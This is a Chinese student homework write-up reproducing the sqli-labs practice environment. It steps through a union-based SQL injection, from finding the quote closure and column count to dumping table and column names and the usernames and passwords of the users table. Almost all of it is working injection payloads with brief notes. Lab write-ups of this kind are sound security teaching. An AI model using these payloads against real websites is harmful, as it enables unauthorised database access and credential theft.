网络安全第十次作业

sqli-labs复现

通过在id后面加反斜杠\发现是单引号闭合

1.查询字段数

有3个字段
?id=1' and 1=1 order by 3 -- qwe	//正常
?id=1' and 1=1 order by 4 -- qwe  //报错

2.查询输出点

?id=1' and 1=2 union select 1,2,3 -- qwe

3.查询库名

?id=1' and 1=2 union select 1,database(),3 -- qwe					//库名是security

4.查询表名

有emails,referers,uagents,users表

?id=1' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- qwe

5.查询字段名

查询users表：
有字段：id,username,password
?id=1' and 1=2 union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='users' limit 0,1 -- qwe
?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' -- qwe

6.查询数据

?id=1' and 1=2 union select 1,username,3 from users limit 0,1 -- qwe

?id=1' and 1=2 union select 1,group_concat(id,0x3a,username,0x3a,password,0x3c,0x68,0x72,0x2F,0x3E),3 from users limit 0,1 -- qwe
0x3a	:
0x3c	<
0x68	h
0x72	r
0x2F	/
0x3E	>